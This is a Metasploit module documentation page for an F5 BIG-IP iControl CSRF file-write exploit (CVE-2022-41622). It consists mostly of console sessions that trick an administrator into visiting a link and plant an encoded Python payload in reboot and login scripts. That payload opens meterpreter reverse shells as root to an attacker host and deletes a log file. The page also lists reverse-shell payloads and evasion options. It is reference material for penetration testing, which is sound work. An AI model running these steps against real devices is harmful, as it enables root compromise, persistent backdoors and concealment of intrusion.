F5 BIG-IP iControl CSRF File Write SOAP API - Metasploit


This page contains detailed information about how to use the exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: F5 BIG-IP iControl CSRF File Write SOAP API
Module: exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
Source code: modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb
Disclosure date: 2022-11-16
Last modification time: 2022-11-18 16:18:25 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): 443
List of CVEs: CVE-2022-41622, CVE-2022-41800

This module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
msf exploit(f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit

Required Options


  • TARGET_HOST: The IP or domain name of the target F5 device

Knowledge Base


Vulnerable Application


The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be downloaded as a VMWare image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this.

Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password.

Verification Steps


This is a CSRF vuln, so it requires a browser in addition to msf:

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
  4. Do set TARGET_HOST <target> / set LHOST <yourtest>
  5. Do: run
  6. You should get a url such as: http://10.0.0.179:8080/ddgjZO
  7. Open a browser and visit that URL
  8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the admin account from earlier works great)

Options


TARGET_HOST / TARGET_URI / TARGET_SSL

These are the target that the user will be redirected to

FILENAME

If the TARGET is 2 (Custom), the file that will be overwritten with the payload

Scenarios


F5 Big-IP 17.0.0.1 - Target 0 (Restart)

Start the listener:

msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
TARGET_HOST => 10.0.0.162

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
[*] Server started.

Then, a legit user that has HTTP Basic authentication (or who can be tricked into performing HTTP Basic authentication) needs to visit that URL. When any user connects, they'll be redirected to the SOAP endpoint and you'll see:

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit

[*] Started reverse TCP handler on 10.0.0.179:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
[*] Server started.

[... wait for a user to visit the URL ...]

[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted

We have no way to tell whether this was successful; however, if we already have access to the target (ie, if you're testing this), we can check if the file was successfully planted:

[root@bigip:Active:Standalone] config # cat /shared/f5_update_action 
UpdateAction
https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
https://localhost/error
0
0
0
0

The code planted there will activate at reboot. So, ...wait till the target reboots. Perhaps when they update! Again, if you have shell access, you can check the log file when it boots:

[root@bigip:INOPERATIVE:] config # tail -f /var/log/f5_update_checker.out
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file found -- parsing
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file action: "UpdateAction"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Executing EM action: UpdateAction
[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
[...wait 2 minutes...]
[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Finished sleeping.
[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Attempting to connect to EM server: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]

And, on Metasploit:

[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
[...wait 2 minutes...]
[*] Sending stage (40164 bytes) to 10.0.0.162
[+] Deleted /var/log/f5_update_checker.out
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:51388) at 2022-11-14 15:28:04 -0800

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root

F5 Big-IP 17.0.0.1 - Target 1 (Login)

This works similarly.. use the module, set the TARGET_HOST, and set the TARGET to 1:

msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
TARGET_HOST => 10.0.0.162

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 1
TARGET => 1

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://10.0.0.179:8080/ePg5ECHuVD
[*] Server started.

[...wait for an authenticated user to click the link...]

[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively

Once again, if you already have access, you can verify it worked:

[root@bigip:Active:Standalone] config # cat /etc/profile.d/timeout.sh 
echo exec\(__import__\(\'base64\'\).b64decode[...]

Then, when a user logs in (ie, ssh root@<target> or on the console), you get a session:

[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively

[...wait for a user to log in..]

[*] Sending stage (40168 bytes) to 10.0.0.162
[+] Deleted /var/run/config/timeout.sh
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:43902) at 2022-11-14 15:32:26 -0800

meterpreter > getuid
Server username: root

F5 Big-IP 17.0.0.1 - Target 2 (Custom)

Once again, set up the server:

msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
TARGET_HOST => 10.0.0.162

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
LHOST => 10.0.0.179

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 2
TARGET => 2

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set FILENAME /tmp/testmsfmodule
FILENAME => /tmp/testmsfmodule

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444 
[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
[*] Using URL: http://10.0.0.179:8080/PLvOVjkiVvXX
[*] Server started.

[...wait for an admin to visit that link...]

[*] Redirecting the admin to overwrite /tmp/testmsfmodule with the payload

You can verify the file exists:

# cat /tmp/testmsfmodule 
echo exec\(__import__\(\'base64\'\).b64decode[...]

Note that while this is written by root, you're in a pretty strict SELinux context so most obvious attacks (like writing to /etc/profile.d, /root/.ssh, etc., won't work).

Go back to menu.

Msfconsole Usage


Here is how the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622

[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show info

       Name: F5 BIG-IP iControl CSRF File Write SOAP API
     Module: exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
   Platform: Unix, Linux
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-11-16

Provided by:
  Ron Bowes

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Restart
  1   Login
  2   Custom

Check supported:
  No

Basic options:
  Name         Current Setting               Required  Description
  ----         ---------------               --------  -----------
  FILENAME                                   no        The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great dea
                                                       l of useful files
  SRVHOST      0.0.0.0                       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to l
                                                       isten on all addresses.
  SRVPORT      8080                          yes       The local port to listen on.
  SSL          true                          no        Negotiate SSL for incoming connections
  SSLCert                                    no        Path to a custom SSL certificate (default is randomly generated)
  TARGET_HOST                                yes       The IP or domain name of the target F5 device
  TARGET_SSL   true                          yes       Use SSL for the upstream connection?
  TARGET_URI   /iControl/iControlPortal.cgi  yes       The URI of the SOAP API
  URIPATH                                    no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits a cross-site request forgery (CSRF) 
  vulnerability in F5 Big-IP's iControl interface to write an 
  arbitrary file to the filesystem. While any file can be written to 
  any location as root, the exploitability is limited by SELinux; the 
  vast majority of writable locations are unavailable. By default, we 
  write to a script that executes at reboot, which means the payload 
  will execute the next time the server boots. An alternate target - 
  Login - will add a backdoor that executes next time a user logs in 
  interactively. This overwrites a file, but we restore it when we get 
  a session Note that because this is a CSRF vulnerability, it starts 
  a web server, but an authenticated administrator must visit the 
  site, which redirects them to the target.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-41622
  https://github.com/rbowes-r7/refreshing-soap-exploit
  https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/
  https://support.f5.com/csp/article/K97843387
  https://support.f5.com/csp/article/K94221585
  https://support.f5.com/csp/article/K05403841

View the full module info with the info -d command.

Module Options


This is a complete list of options available in the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 exploit:

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show options

Module options (exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622):

   Name         Current Setting               Required  Description
   ----         ---------------               --------  -----------
   FILENAME                                   no        The file on the target to overwrite (for "custom" target) - note that SELinux prevents overwriting a great de
                                                        al of useful files
   SRVHOST      0.0.0.0                       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                                        listen on all addresses.
   SRVPORT      8080                          yes       The local port to listen on.
   SSL          true                          no        Negotiate SSL for incoming connections
   SSLCert                                    no        Path to a custom SSL certificate (default is randomly generated)
   TARGET_HOST                                yes       The IP or domain name of the target F5 device
   TARGET_SSL   true                          yes       Use SSL for the upstream connection?
   TARGET_URI   /iControl/iControlPortal.cgi  yes       The URI of the SOAP API
   URIPATH                                    no        The URI to use for this exploit (default is random)

Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Restart


View the full module info with the info, or info -d command.

Advanced Options


Here is a complete list of advanced options supported by the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 exploit:

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show advanced

Module advanced options (exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AllowNoCleanup          false            no        Allow exploitation without the possibility of cleaning up files
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ListenerBindAddress                      no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                         no        The port to bind to if different from SRVPORT
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23,
                                                       SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Payload advanced options (cmd/unix/python/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   HttpCookie                                    no        An optional value to use for the Cookie HTTP header
   HttpHostHeader                                no        An optional value to use for the Host HTTP header
   HttpReferer                                   no        An optional value to use for the Referer HTTP header
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Enable debugging for the Python meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framework/wiki/Meter
                                                           preter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOS
                                                           T
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

View the full module info with the info, or info -d command.

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 module can exploit:

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Restart
   1   Login
   2   Custom

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 exploit:

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show payloads

Compatible Payloads
===================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                              normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                                  normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_inetd                                            normal  No     Unix Command Shell, Bind TCP (inetd)
   3   payload/cmd/unix/bind_jjs                                              normal  No     Unix Command Shell, Bind TCP (via jjs)
   4   payload/cmd/unix/bind_lua                                              normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   payload/cmd/unix/bind_netcat                                           normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   payload/cmd/unix/bind_netcat_gaping                                    normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   payload/cmd/unix/bind_netcat_gaping_ipv6                               normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   payload/cmd/unix/bind_nodejs                                           normal  No     Unix Command Shell, Bind TCP (via nodejs)
   9   payload/cmd/unix/bind_perl                                             normal  No     Unix Command Shell, Bind TCP (via Perl)
   10  payload/cmd/unix/bind_perl_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   11  payload/cmd/unix/bind_r                                                normal  No     Unix Command Shell, Bind TCP (via R)
   12  payload/cmd/unix/bind_ruby                                             normal  No     Unix Command Shell, Bind TCP (via Ruby)
   13  payload/cmd/unix/bind_ruby_ipv6                                        normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   14  payload/cmd/unix/bind_socat_udp                                        normal  No     Unix Command Shell, Bind UDP (via socat)
   15  payload/cmd/unix/bind_stub                                             normal  No     Unix Command Shell, Bind TCP (stub)
   16  payload/cmd/unix/bind_zsh                                              normal  No     Unix Command Shell, Bind TCP (via Zsh)
   17  payload/cmd/unix/generic                                               normal  No     Unix Command, Generic Command Execution
   18  payload/cmd/unix/pingback_bind                                         normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   19  payload/cmd/unix/pingback_reverse                                      normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   20  payload/cmd/unix/python/meterpreter/bind_tcp                           normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager
   21  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   22  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   23  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   26  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   27  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   29  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   30  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   31  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   32  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   33  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   35  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   36  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   37  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   38  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   39  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   40  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   41  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   42  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   43  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   44  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   45  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   46  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   47  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   48  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   49  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   50  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   51  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   52  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   53  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   54  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   55  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   56  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   57  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   58  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   59  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   60  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   61  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   62  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   63  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   64  payload/cmd/windows/powershell/generic/debug_trap                      normal  No     Powershell Exec, Generic x86 Debug Trap
   65  payload/cmd/windows/powershell/generic/tight_loop                      normal  No     Powershell Exec, Generic x86 Tight Loop
   66  payload/generic/custom                                                 normal  No     Custom Payload
   67  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   68  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   69  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_p
                                                        ad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

For custom targets, please provide the FILENAME


Here is a relevant code snippet related to the "For custom targets, please provide the FILENAME" error message:

155:	  end
156:	
157:	  def exploit
158:	    # Sanity check
159:	    if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)
160:	      fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')
161:	    end
162:	
163:	    print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')
164:	    super
165:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Ron Bowes

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.